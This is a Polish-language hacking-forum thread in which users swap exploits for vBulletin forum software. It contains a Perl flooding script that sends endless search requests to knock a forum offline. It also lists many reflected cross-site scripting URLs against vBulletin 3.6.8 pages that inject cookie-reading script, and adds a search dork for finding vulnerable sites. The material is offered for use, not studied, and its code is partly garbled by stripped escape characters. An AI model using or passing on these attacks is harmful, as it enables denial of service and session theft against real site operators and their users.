Originally posted by abramakabra
Sprawdź na http://milw0rm.com/
Originally posted by Morpheuss+--><div class='quotetop'>CYTAT(Morpheuss)</div><!--QuoteBegin-abramakabraSprawdź na http://milw0rm.com/
niestety niema :no:[/b]
#!"c:perlbinperl.exe"
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http://)//eg;
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1rn".
"Accept: */*rn".
"Accept-Language: en-gbrn".
"Content-Type: application/x-www-form-urlencodedrn".
"Accept-Encoding: gzip, deflatern".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)rn".
"Host: $hostrn".
"Content-Length: $lenrn".
"Connection: Keep-Alivern".
"Cache-Control: no-cachernrn".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|";
}
print "nn";
system('ping $host');
sub usage {
print "tusage: n";
print "t$0 n";
print "tex: $0 127.0.0.1 /forum/n";
print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn";
print "~rippers~ teamn";
print "twww.~rippers~.orgnn";
exit();
};
#Exploit
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#name:Black Scorpion
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#web : [url]www.r3d-crew.com[/url] & [url]www.Xp10.cc[/url]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#seript: vBulletin V3.6.8ulletin V3.6.8
{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
{}{}
{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
{}{}
}
#Exploit
[url]http://name.com/vBulletin[/url] V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
Or
[url]http://name.com/vBulletin[/url] V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/index.php?s=<script>alert('document.cookie')</script>
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
[url]http://www.xxx.com/vBulletin[/url] V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0
#dork: vBulletinŽ Version 3.6.8